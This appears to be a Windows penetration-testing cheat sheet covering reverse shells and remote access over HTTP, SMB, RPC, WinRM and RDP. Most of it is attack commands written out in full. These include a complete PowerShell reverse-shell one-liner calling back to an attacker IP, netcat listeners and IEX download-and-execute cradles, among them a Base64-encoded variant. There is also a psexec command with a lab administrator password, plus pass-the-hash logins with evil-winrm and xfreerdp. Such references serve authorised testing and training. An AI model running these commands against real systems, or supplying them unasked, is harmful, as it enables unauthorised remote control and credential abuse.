PRIMARY CATEGORY → WINDOWS PENTESTING
HTTP ↔ TCP
Nishang PS Reverse Shell
- From the Attacker 🗡️
Reverse Shell
Modify the Oneliner IP Address and Port as follows
$client = New-Object System.Net.Sockets.TCPClient('10.10.16.30',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()Simple HTTP Server
Check Simple HTTP Servers here
Setup a Web Server to share the Reverse Shell
python3 -m http.server 8888Listening Socket
Check Listening Sockets → Reference I ⚡ Reference II
Listen in at the port set in the Reverse Shell Script
rlwrap nc -nlvp 1234- From the Target 🎯
Reverse Connection
Request the Reverse Shell → (New-Object Net.WebClient).DownloadString('<URL>')
Execute it → IEX or Invoke-Expression
start /b powershell.exe -Command IEX (New-Object Net.Webclient).DownloadString('http://10.10.16.30:443/reverse_shell.ps1')Same in Bash
The above Reverse Shell Workflow would be the same as the following with bash
curl --silent --request GET --location "URL" | bash -
PS v3.0 or >
IEX (IWR -UseBasicParsing -Uri '<URL>') # Or Invoke-Expression (Invoke-WebRequest '<URL>')SMB
PSExec
This tool from impacket can be used to stablish a bind shell if the user authenticated has administrative privileges in the Workstation or Domain Computer
CMD
This tool allow an attacker to get a shell with cmd.exe
psexec.py -dc-ip <TARGET> <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET>PS
Sometimes it gets tricky to launch a powershell.exe instance. We can accomplish this task simply stablishing a reverse shell via Invoke-Expression aka IEX
Reverse Shell Payload
curl --silent --request GET --location --output <FILE> "https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Shells/Invoke-PowerShellTcpOneLine.ps1"Simple HTTP Server
python3 -m http.server <PORT>Listening Socket
rlwrap -CaR nc -nlvp <PORT>HTTP Request From Target and Reverse Shell Execution
psexec.py -dc-ip 10.129.135.22 active.htb/Administrator:Ticketmaster1968@active.htb "powershell.exe -Exec Bypass -Command IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.34:8888/reverse.ps1')"Caution
If something goes wrong and the reverse connection cannot be stablished, just change the above powershell command’s scheme codification to
UTF-16LEand Base64 encode itecho -n "IEX (New-Object Net.WebClient).DownloadString('http://HOST:PORT/FILE')" | iconv --to-code UTF-16LE | base64 -w 0 ; echoThen pass that Base64 String as argument to the
powershell.exeinstance executed bypsexecpsexec.py -dc-ip TARGET DOMAIN/USERNAME:PASSWORD@TARGET 'powershell.exe -Exec Bypass -Enc "BASE64_STRING"'
RPC
WMIExec
wmiexec.py -dc-ip <TARGET> <DOMAIN>/<USERNAME>:<PASSWORD>@<TARGET_IP>WinRM
EvilWinRM
Password Auth
evil-winrm --ip <TARGET> --port <PORT> --user <USER> --password <PASSWORD>Pass The Hash
evil-winrm --ip <TARGET> --port <PORT> --user <USER> --hash <NTHASH>SSL Enabled
evil-winrm --ip <TARGET> --port <PORT> --ssl --user <USER> --password <PASSWORD>Upload and Download a File
Warning
The Absolute Path has to be specified for both uploading and downloading
PS> upload <LOCAL_PATH> <TARGET_FULL_PATH> # Upload
PS> download <TARGET_FULL_PATH> <LOCAL_PATH> # DownloadNetexec
Remote Command Execution
- CMD
netexec winrm <TARGET> -d <DOMAIN> --username <USER> --password <PASSWORD> -x <COMMAND>- PS
netexec winrm <TARGET> -d <DOMAIN> --username <USER> --password <PASSWORD> -X <COMMAND>RDP
RDesktop
rdesktop -u <USER> <TARGET>
rdesktop -d <DOMAIN> -u <USER> -p <PASSWORWD> <TARGET>XFreeRDP
Password Auth
xfreerdp /u:<DOMAIN>\<USER> /p:<PASSWORD> /v:<TARGET>:<PORT>Pass The Hash
xfreerdp /u:<DOMAIN>\<USER> /pth:<NTHASH> /v:<TARGET>:<PORT>Skip Certificate Validation
xfreerdp /u:<USER> /p:<PASSWORD> /v:<TARGET>:<PORT> /cert:ignoreRemmina
CLI
remmina -c rdp://<USER>:<PASSWORD>@<TARGET>:<PORT>Powershell
PSCredential + Invoke-Command -ScriptBlock
Creation of Credentials Object
$user = '<DOMAIN>\<USERNAME>'
$password = ConverTo-SecureString -AsPlainText -Force -String <PLAIN_PASSWORD>
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user,$passwordCommand Execution as Another User
Invoke-Command -ComputerName <HOSTNAME> -Credential $credential -ScriptBlock { <COMMAND> }